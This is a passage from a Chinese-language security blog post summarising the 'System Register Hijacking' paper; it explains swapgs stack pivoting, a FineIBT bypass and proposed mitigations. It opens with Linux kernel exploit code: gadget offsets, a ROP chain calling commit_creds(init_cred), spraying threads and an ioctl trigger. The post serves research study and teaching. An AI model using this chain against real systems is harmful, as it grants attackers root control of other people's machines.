malicious gsbase address in userspace&#x27;s gsbase</span></span><br><span class="line">wrgsbase(guess);</span><br><span class="line"></span><br><span class="line">   <span class="comment">// we want this for later</span></span><br><span class="line">   u64 saved_rsp;</span><br><span class="line">   <span class="keyword">asm</span>(<span class="string">&quot;.intel_syntax noprefix;&quot;</span></span><br><span class="line">       <span class="string">&quot;mov %0, rsp;&quot;</span></span><br><span class="line">       <span class="string">&quot;.att_syntax prefix;&quot;</span></span><br><span class="line">       : <span class="string">&quot;=r&quot;</span>(saved_rsp)</span><br><span class="line">   );</span><br><span class="line">   <span class="comment">// ensure rsp is aligned for later</span></span><br><span class="line">   saved_rsp |= <span class="number">0x8</span>;</span><br><span class="line"></span><br><span class="line">   u64 cli_ret =      (<span class="number">0xffffffff8211ba15</span><span class="number">-0xffffffff81000000</span>)+kaslr_base;</span><br><span class="line">   u64 ret =          (<span class="number">0xffffffff8211ba15</span><span class="number">-0xffffffff81000000</span>)+kaslr_base;</span><br><span class="line">   u64 sti_ret =      (<span class="number">0xffffffff82128e80</span><span class="number">-0xffffffff81000000</span>)+kaslr_base;</span><br><span class="line">   u64 swapgs_ret =   (<span class="number">0xffffffff8220130c</span><span class="number">-0xffffffff81000000</span>)+kaslr_base; <span class="comment">// pops rbp</span></span><br><span class="line">   u64 pop_rdi_ret =  (<span class="number">0xffffffff818cee6c</span><span class="number">-0xffffffff81000000</span>)+kaslr_base;</span><br><span class="line">   u64 init_cred =    (<span class="number">0xffffffff8328c7e0</span><span class="number">-0xffffffff81000000</span>)+kaslr_base;</span><br><span class="line">   u64 commit_creds = (<span class="number">0xffffffff81139b20</span><span class="number">-0xffffffff81000000</span>)+kaslr_base;</span><br><span class="line">   u64 pop_rcx_ret =  (<span class="number">0xffffffff810a0613</span><span class="number">-0xffffffff81000000</span>)+kaslr_base;</span><br><span class="line">   u64 iretq =        (<span class="number">0xffffffff822018a7</span><span class="number">-0xffffffff81000000</span>)+kaslr_base;</span><br><span class="line">   u64 user_rip_target = (u64)from_kernel;</span><br><span class="line"></span><br><span class="line">   u64 rop[] = &#123;</span><br><span class="line">       cli_ret, <span class="comment">// once swapgs executes we don&#x27;t care anyways</span></span><br><span class="line">       swapgs_ret,</span><br><span class="line">       <span class="number">0</span>,</span><br><span class="line">       pop_rdi_ret,</span><br><span class="line">       init_cred,</span><br><span class="line">       commit_creds,</span><br><span class="line">       swapgs_ret,</span><br><span class="line">       saved_rsp, <span class="comment">// rbp</span></span><br><span class="line">       iretq,</span><br><span class="line">       user_rip_target,</span><br><span class="line">       <span class="number">0x33</span>,  <span class="comment">// cs</span></span><br><span class="line">       <span class="number">0x246</span>, <span class="comment">// eflags</span></span><br><span class="line">       saved_rsp,</span><br><span class="line">       <span class="number">0x2b</span>,  <span class="comment">// ss</span></span><br><span class="line">   &#125;;</span><br><span class="line">   <span class="type">int</span> rop_len = <span class="keyword">sizeof</span>(rop)/<span class="keyword">sizeof</span>(rop[<span class="number">0</span>]);</span><br><span class="line"></span><br><span class="line">   populate_spray(spray_pgs, <span class="number">512</span>, guess, rop_len, rop);</span><br><span class="line"></span><br><span class="line">   spawn_orw_thread(<span class="number">0</span>, <span class="number">512</span>, spray_pgs, guess, kaslr_base);</span><br><span class="line">   spawn_orw_thread(<span class="number">1</span>, <span class="number">512</span>, spray_pgs, guess, kaslr_base);</span><br><span class="line">   spawn_orw_thread(<span class="number">2</span>, <span class="number">512</span>, spray_pgs, guess, kaslr_base);</span><br><span class="line">   spawn_orw_thread(<span class="number">3</span>, <span class="number">512</span>, spray_pgs, guess, kaslr_base);</span><br><span class="line">   spawn_orw_thread(<span class="number">4</span>, <span class="number">512</span>, spray_pgs, guess, kaslr_base);</span><br><span class="line">   spawn_orw_thread(<span class="number">5</span>, <span class="number">512</span>, spray_pgs, guess, kaslr_base);</span><br><span class="line">   spawn_orw_thread(<span class="number">6</span>, <span class="number">512</span>, spray_pgs, guess, kaslr_base);</span><br><span class="line"></span><br><span class="line">   <span class="built_in">printf</span>(<span class="string">&quot;Triggering gadget...\n&quot;</span>);</span><br><span class="line"></span><br><span class="line">   sleep(<span class="number">1</span>);</span><br><span class="line"></span><br><span class="line">   <span class="comment">/*</span></span><br><span class="line"><span class="comment">   .text:FFFFFFFF82201A20 000 0F 01 F8                      swapgs</span></span><br><span class="line"><span class="comment">   .text:FFFFFFFF82201A23 000 41 89 E0                      mov     r8d, esp</span></span><br><span class="line"><span class="comment">   .text:FFFFFFFF82201A26 000 EB 12                         jmp     short loc_FFFFFFFF82201A3A</span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment">   .text:FFFFFFFF82201A3A                                   loc_FFFFFFFF82201A3A:                   ; CODE XREF: entry_SYSCALL_compat+6↑j</span></span><br><span class="line"><span class="comment">   .text:FFFFFFFF82201A3A 000 65 48 8B 24 25 98 28 03 00    mov     rsp, gs:32898h</span></span><br><span class="line"><span class="comment">   .text:FFFFFFFF82201A3A                                   entry_SYSCALL_compat endp</span></span><br><span class="line"><span class="comment">   */</span></span><br><span class="line"></span><br><span class="line">   <span class="comment">// Trigger a hijacked call with the entry_SYSCALL_compat gadget</span></span><br><span class="line">   u64 entry_SYSCALL_compat = (<span class="number">0xffffffff82201a20</span><span class="number">-0xffffffff81000000</span>)+kaslr_base;</span><br><span class="line"></span><br><span class="line">   <span class="comment">/*</span></span><br><span class="line"><span class="comment">       case 1339: // arbitrary call</span></span><br><span class="line"><span class="comment">           void (*target)(void) = (void (*)(void))arg;</span></span><br><span class="line"><span class="comment">           target();</span></span><br><span class="line"><span class="comment">           break;</span></span><br><span class="line"><span class="comment">   */</span></span><br><span class="line"></span><br><span class="line">   ioctl(dbg, <span class="number">1339</span>, entry_SYSCALL_compat);</span><br></pre></td></tr></table></figure>

<p>直接看可能有点抽象，所以这里我就简单的画了一个流程图：  </p>
<img src="/2025/11/07/srh/6.png" class="" title="我的图图呢">  

<p>这里我只进行简单的介绍，如果看不懂的话可以自己去调试一遍，我相信这将会极大的加深你对这种利用手法的理解  </p>
<p>首先用户在一块可控的内核空间上伪造一个恶意的 gs 结构，并且将里面存放的栈地址指向恶意的即后面 rop 链的地址，然后使用 wrgsbase 指令将用户态的 gsbase 指向我们在 kernel 中伪造的 gs 结构</p>
<p>假设我们已经获取 kernel 任意地址 call 的原语，我们在内核态去调用 entry_SYSCALL_compat 这个函数，在继续讲之前先看看这个函数他做了什么：  </p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">.text:FFFFFFFF82201A20 000 0F 01 F8                      swapgs</span><br><span class="line">.text:FFFFFFFF82201A23 000 41 89 E0                      mov     r8d, esp</span><br><span class="line">.text:FFFFFFFF82201A26 000 EB 12                         jmp     short loc_FFFFFFFF82201A3A</span><br><span class="line"></span><br><span class="line">.text:FFFFFFFF82201A3A                                   loc_FFFFFFFF82201A3A:                   ; CODE XREF: entry_SYSCALL_compat+6↑j</span><br><span class="line">.text:FFFFFFFF82201A3A 000 65 48 8B 24 25 98 28 03 00    mov     rsp, gs:32898h</span><br><span class="line">.text:FFFFFFFF82201A3A    </span><br></pre></td></tr></table></figure>

<p>可以看见他先使用了 swapgs 来交换用户态和内核态的 gsbase，然后将对应的 gs 结构体里面的栈地址取出并赋值给 rsp，由于当前程序流处于内核态且 gsbase 是 kernel 的 gsbase，所以执行 swapgs 后当前的 gsbase 就指向用户态的 gs 地址，然后将其 gs 结构的栈地址取出赋值给 rsp。我们前面已经将用户态的 gsbase 指向了用户伪造的恶意 gs 结构，且栈地址被我们修改为我们用于布置 rop 的地址，也就是说执行完 entry_SYSCALL_compat 可以直接将栈迁移到我们的提前布置好的 rop 上。由于我们的程序流还是在内核态而 gsbase 指向用户态的 gs 结构，很容易会出现一些奇奇怪怪的现象，所以 rop 在一开始就要先调用 swapgs; ret 来将 gsbase 切换为内核态的，然后后面就是正常的 rop 了:)  </p>
<img src="/2025/11/07/srh/7.png" class="" title="我的图图呢">  

<p>作者直接拿原有的几个 cve 的 exp 进行修改，将最后劫持程序流利用那部分修改成他提出的 swapgs Stack Pivoting 方法进行对比成功率，发现大部分的情况成功率都不变，少部分情况成功率出现了小幅度的降低，可见这种利用方法是可行的，至于实用性，他好像没有说🤣  </p>
<img src="/2025/11/07/srh/8.png" class="" title="我的图图呢">  
<p>然后作者提出他的这个 swapgs Stack Pivoting 利用手法是唯一一个可以从前向边缘来绕过 FineIBT 保护机制的（我很怀疑🥲，但是汇报时没有提出来）  </p>
<p>说到 FineIBT，那肯定要先介绍 IBT，在说 IBT 前那肯定要先介绍 CET  </p>
<img src="/2025/11/07/srh/9.png" class="" title="我的图图呢">  

<p>CET 机制是 Intel 提出的⽤于缓解 ROP&#x2F;JOP&#x2F;COP 的新技术。基于硬件⽀持的解决⽅案，旨在预防前向（ call&#x2F;jmp ）和后向（ ret ）控制流指令劫持。  </p>
<p>用于预防后向控制流指令劫持的方法是 shadow stack，这并不在今天的讨论范围内，如果感兴趣可以自行上网去查找资料。而用于预防向前控制流指令劫持的方法则是使用 IBT。IBT 为程序每个有可能被 call 或者 jmp 的地方加了个 endbr 指令，当程序执行了 call 或者 jmp 指令的时候下一条指令必须是 endbr，否则就会抛出 #cp 异常。这极大的限制了攻击者去 call 或者 jmp 一些比较利于利用的 gadget，但由于程序中拥有大量的 endbr 指令，所以攻击者依然可以通过更加曲折的路径来进行利用链的构造，依然能够进行向前控制流指令劫持，所以这个时候就有人提出了 IBT 的加强版本即 FineIBT</p>
<p>关于 FineIBT 的论文可以在如下链接进行查看：<a target="_blank" rel="noopener" href="https://dl.acm.org/doi/fullHtml/10.1145/3607199.3607219">FineIBT</a> 这里只会进行简单的描述  </p>
<img src="/2025/11/07/srh/10.png" class="" title="我的图图呢">  

<p>每个函数都会有一个自己的 SID 值，当程序在 call 或者 jmp 到一个函数前会先设置一个 SID 值来表示他要 call 或者 jmp 的是这一类 SID 的函数，每个函数的开头会先进行 SID 的校验，如果 SID 不一致程序将会停止运行，而 SID 一致的话则会继续执行该函数。  </p>
<p>如上图所示，main 函数在 call 之前将 SID 设置为 0xc00010ff，即将 0xc00010ff 赋值给 eax 寄存器。当 call 的函数为 func0 时，通过检验发现 eax 寄存器的指为 0xc00010ff，然后跳转到 func0_entry 来继续执行 func0 函数。而如果 main 函数 call 的是 func1 函数时，由于 SID 校验不通过（func1 SID 的值为 0xbaddcafe），则会向下执行 hlt 指令来让程序停止运行。  </p>
<p>而在 linux 中 FineIBT 长下图这个样：  </p>
<img src="/2025/11/07/srh/11.png" class="" title="我的图图呢">  

<p>每个（其实也不是）函数都会有一个对应的 _<em>cfi</em> 前缀的函数，这个函数第一条指令为 endbr，然后后面接着的是 SID 校验，当校验成功时才会跳转到真正的函数入口，而真正的函数是没有 endbr 指令的，所以我们无法通过任意地址 call&#x2F;jmp 原语来直接调用他。  </p>
<p>介绍完 FineIBT 后，来看看作者是如何绕过这个保护的。原理很简单  </p>
<img src="/2025/11/07/srh/12.png" class="" title="我的图图呢">  

<p>如上图所示，作者发现有许多与 syscall 入口相关的函数都有 endbr 指令但是不需要进行 SID 校验，而刚好他提出的 swapgs Stack Pivoting 用的就是这些函数，所以原理就是这么简单🤣🤣🤣  </p>
<p>作者在后面也提出了他前面所提出的各种利用方法对应的缓解措施，对于这个 FineIBT 绕过的 Mitigation 就是给这些函数都加上 _<em>cfi</em> 🤣🤣🤣  </p>
<p>这里有个比较有趣的现象是当我们直接去 IDA 中去看这个 _<em>cfi</em> 函数时会发现里面全是 nop，而真正的函数入口处有 endbr，根本起不到防御的作用，而当我们在启动的时候开启了 FineIBT 选项后 kernel 在加载进内存后他会动态修改他的代码段，在 _<em>cfi</em> 上加上 endbr 以及一些 SID 的校验操作，然后将真正的函数入口处的 endbr 改成 nop，如下图所示：  </p>
<img src="/2025/11/07/srh/13.png" class="" title="我的图图呢">  

<p>作者在论文的最后提出了应对各种利用手法的 Mitigation，具体内容如下：  </p>
<p><strong>cr0&#x2F;cr4:</strong><br>扩展 CR-Pinning: 把关键控制寄存器的安全位（如 CR0.WP 、 CR4.SMEP&#x2F;SMAP ）固定为期望值，并对任何修改这些位的尝试进行拦截、校验或拒绝<br><strong>lidt:</strong><br>这些 lidt gadget可以通过强制其值始终设置为它们所在的位置的常量虚拟地址来缓解。在现代 PML4 Linux 上，这始终是 0xfffffe0000000000。在任何 lidt 指令后对值进⾏后检查并重置其值应 该⾜以防⽌其被滥⽤。<br><strong>popf:</strong><br>该类指令数量太多，暂无较好的方法<br><strong>swapgs:</strong><br>对来⾃⽤⼾空间的 GSBase 值 进⾏检测<br><strong>FineIBT bypass:</strong><br>给漏网之鱼函数都加上_cfi_</p>
<p>仔细一看这些 Mitigation 还真的是“简单粗暴”啊🤔 </p>
<p>说到底，这篇论文提出的各种系统寄存器的劫持手段在非常多年前就给用所用过了。可能让人比较陌生的是对 gsbase 的劫持，可是这玩意也在 2014 年的一个 cve 上被人利用过，以及在许多高质量的 CTF 比赛中都被拿来出过题，我在下图中简单的举了几个例子，感兴趣的话可以去看看：  </p>
<img src="/2025/11/07/srh/14.png" class="" title="我的图图呢">  

<p>所以这篇论文的创新点在哪里呢，就是找到了几个比较好用的 gadget 和提出了一些非常“简单粗暴”的 Mitigation？🤔  </p>
<p>那我就很纳闷了，为什么这也能够发顶会，于是我和我的小伙伴们展开了讨论：  </p>
<img src="/2025/11/07/srh/15.png" class="" title="我的图图呢">  

<p>最终结论是作者的文笔比较好，所以能发顶会🤣  </p>
<h2 id="写道最后"><a href="#写道最后" class="headerlink" title="写道最后"></a>写道最后</h2><p>如果以后我组会分享的内容我感觉有意思的话应该也会更新到博客上来:)  </p>
<h2 id="reference"><a href="#reference" class="headerlink" title="reference"></a>reference</h2><p><strong>CET</strong><br><a target="_blank" rel="noopener" href="https://linuxkernel.org.cn/doc/html/latest/arch/x86/shstk.html">https://linuxkernel.org.cn/doc/html/latest/arch/x86/shstk.html</a><br><strong>CFI</strong><br><a target="_blank" rel="noopener" href="https://www.cnblogs.com/Iflyinsky/p/18328698">https://www.cnblogs.com/Iflyinsky/p/18328698</a><br><a target="_blank" rel="noopener" href="https://tjtech.me/kernel-cfi-failure-analysis.html">https://tjtech.me/kernel-cfi-failure-analysis.html</a><br><a target="_blank" rel="noopener" href="https://clang.llvm.org/docs/ControlFlowIntegrity.html">https://clang.llvm.org/docs/ControlFlowIntegrity.html</a><br><strong>BTI</strong><br><a target="_blank" rel="noopener" href="https://zhuanlan.zhihu.com/p/370947458#:~:text=BTI%E7%9A%84%E5%85%A8%E7%A7%B0%E6%98%AFbranch%20target%20indentificating%EF%BC%8C%E6%98%AF,Armv8.5%20%E5%A2%9E%E5%8A%A0%E7%9A%84%E9%99%90%E5%88%B6%E6%94%BB%E5%87%BB%E7%9A%84%E5%AE%89%E5%85%A8%E7%89%B9%E6%80%A7%EF%BC%8C%E4%B8%BB%E8%A6%81%E6%98%AF%E6%9D%A5%E8%A7%A3%E5%86%B3JOP%EF%BC%88jump-oriented%20programming%EF%BC%89%E8%BF%99%E7%A7%8D%E6%94%BB%E5%87%BB%E6%96%B9%E5%BC%8F%E3%80%82">https://zhuanlan.zhihu.com/p/370947458#:~:text=BTI%E7%9A%84%E5%85%A8%E7%A7%B0%E6%98%AFbranch%20target%20indentificating%EF%BC%8C%E6%98%AF,Armv8.5%20%E5%A2%9E%E5%8A%A0%E7%9A%84%E9%99%90%E5%88%B6%E6%94%BB%E5%87%BB%E7%9A%84%E5%AE%89%E5%85%A8%E7%89%B9%E6%80%A7%EF%BC%8C%E4%B8%BB%E8%A6%81%E6%98%AF%E6%9D%A5%E8%A7%A3%E5%86%B3JOP%EF%BC%88jump-oriented%20programming%EF%BC%89%E8%BF%99%E7%A7%8D%E6%94%BB%E5%87%BB%E6%96%B9%E5%BC%8F%E3%80%82</a><br><strong>FS&#x2F;GS</strong><br><a target="_blank" rel="noopener" href="https://zhuanlan.zhihu.com/p/435518616">https://zhuanlan.zhihu.com/p/435518616</a><br><a target="_blank" rel="noopener" href="https://zhuanlan.zhihu.com/p/434821566">https://zhuanlan.zhihu.com/p/434821566</a><br><strong>percpu</strong><br><a target="_blank" rel="noopener" href="https://zhuanlan.zhihu.com/p/363969903">https://zhuanlan.zhihu.com/p/363969903</a><br><strong>IBT</strong><br><a target="_blank" rel="noopener" href="https://cn-sec.com/archives/828785.html">https://cn-sec.com/archives/828785.html</a><br><strong>THP</strong><br><a target="_blank" rel="noopener" href="https://www.modb.pro/db/402621?utm_source=index_ai">https://www.modb.pro/db/402621?utm_source=index_ai</a><br><strong>FineIBT</strong><br><a target="_blank" rel="noopener" href="https://dl.acm.org/doi/fullHtml/10.1145/3607199.3607219">https://dl.acm.org/doi/fullHtml/10.1145/3607199.3607219</a><br><a target="_blank" rel="noopener" href="https://blog.csdn.net/Linux_Everything/article/details/146357554">https://blog.csdn.net/Linux_Everything/article/details/146357554</a><br><strong>System Register Hijacking</strong><br><a target="_blank" rel="noopener" href="https://hongkai.org/slides/sec25_System_Register_Hijacking_slides.pdf">https://hongkai.org/slides/sec25_System_Register_Hijacking_slides.pdf</a><br><strong>Swapgs</strong><br><a target="_blank" rel="noopener" href="https://mp.weixin.qq.com/s?__biz=MjM5NTc2MDYxMw==&mid=2458305132&idx=1&sn=be19372c359a3de431828ec1448dc93a&chksm=b181f2e686f67bf0cd07fe04cb761349334caca84469f600163d1d32f7003ee62f306647bc20&scene=27">https://mp.weixin.qq.com/s?__biz=MjM5NTc2MDYxMw==&amp;mid=2458305132&amp;idx=1&amp;sn=be19372c359a3de431828ec1448dc93a&amp;chksm=b181f2e686f67bf0cd07fe04cb761349334caca84469f600163d1d32f7003ee62f306647bc20&amp;scene=27</a><br><strong>Retspill</strong><br><a target="_blank" rel="noopener" href="https://zhuanlan.zhihu.com/p/699064533">https://zhuanlan.zhihu.com/p/699064533</a><br><strong>CR-Pinning</strong><br><a target="_blank" rel="noopener" href="https://patchew.org/linux/20251007065119.148605-1-sohil.mehta@intel.com/20251007065119.148605-6-sohil.mehta@intel.com/">https://patchew.org/linux/20251007065119.148605-1-sohil.mehta@intel.com/20251007065119.148605-6-sohil.mehta@intel.com/</a></p>

  </div>
</article>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
        
          <li><a href="/">Home</a></li>
        
          <li><a href="/about/">About</a></li>
        
          <li><a href="/archives/">Writing</a></li>
        
          <li><a href="/friend/">Link</a></li>
        
      </ul>
    </div>

    
    
      <div id="toc-footer" style="display: none">
        <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%86%99%E5%9C%A8%E6%9C%80%E5%89%8D%E9%9D%A2"><span class="toc-number">1.</span> <span class="toc-text">写在最前面</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#System-Register-Hijacking"><span class="toc-number">2.</span> <span class="toc-text">System Register Hijacking</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%86%99%E9%81%93%E6%9C%80%E5%90%8E"><span class="toc-number">3.</span> <span class="toc-text">写道最后</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#reference"><span class="toc-number">4.</span> <span class="toc-text">reference</span></a></li></ol>
      </div>
    

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://qanux.github.io/2025/11/07/srh/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://qanux.github.io/2025/11/07/srh/&text=论文分享: System Register Hijacking"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://qanux.github.io/2025/11/07/srh/&title=论文分享: System Register Hijacking"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://qanux.github.io/2025/11/07/srh/&is_video=false&description=论文分享: System Register Hijacking"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=论文分享: System Register Hijacking&body=Check out this article: https://qanux.github.io/2025/11/07/srh/"><i class="fa-solid fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://qanux.github.io/2025/11/07/srh/&title=论文分享: System Register Hijacking"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://qanux.github.io/2025/11/07/srh/&title=论文分享: System Register Hijacking"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://qanux.github.io/2025/11/07/srh/&title=论文分享: System Register Hijacking"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://qanux.github.io/2025/11/07/srh/&title=论文分享: System Register Hijacking"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://qanux.github.io/2025/11/07/srh/&name=论文分享: System Register Hijacking&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://qanux.github.io/2025/11/07/srh/&t=论文分享: System Register Hijacking"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fa-solid fa-bars fa-lg" aria-hidden="true"></i> Menu</a>
        
          <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fa-solid fa-list fa-lg" aria-hidden="true"></i> TOC</a>
        
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fa-solid fa-share-alt fa-lg" aria-hidden="true"></i> Share</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up fa-lg" aria-hidden="true"></i> Top</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2023-2025
    Qanux
  </div>
  <div class="footer-right">
    <nav>
      <ul>
        <!--
       --><li><a href="/">Home</a></li><!--
     --><!--
       --><li><a href="/about/">About</a></li><!--
     --><!--
       --><li><a href="/archives/">Writing</a></li><!--
     --><!--
       --><li><a href="/friend/">Link</a></li><!--
     -->
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->


 
  <link
    rel="preload"
    href="/lib/font-awesome/css/all.min.css"
    as="style"
    onload="this.onload=null;this.rel='stylesheet'"
  />
  <noscript
    ><link
      rel="stylesheet"
      href="/lib/font-awesome/css/all.min.css"
  /></noscript>


    <!-- jquery -->

  
<script src="/lib/jquery/jquery.min.js"></script>





<!-- clipboard -->

  
    
<script src="/lib/clipboard/clipboard.min.js"></script>

  
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"Copy to clipboard!\">";
    btn += '<i class="fa-regular fa-clone"></i>';
    btn += '</span>';
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "Copied!");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Baidu Analytics -->

<!-- Cloudflare Analytics -->

<!-- Disqus Comments -->

<!-- utterances Comments -->

</body>
</html>
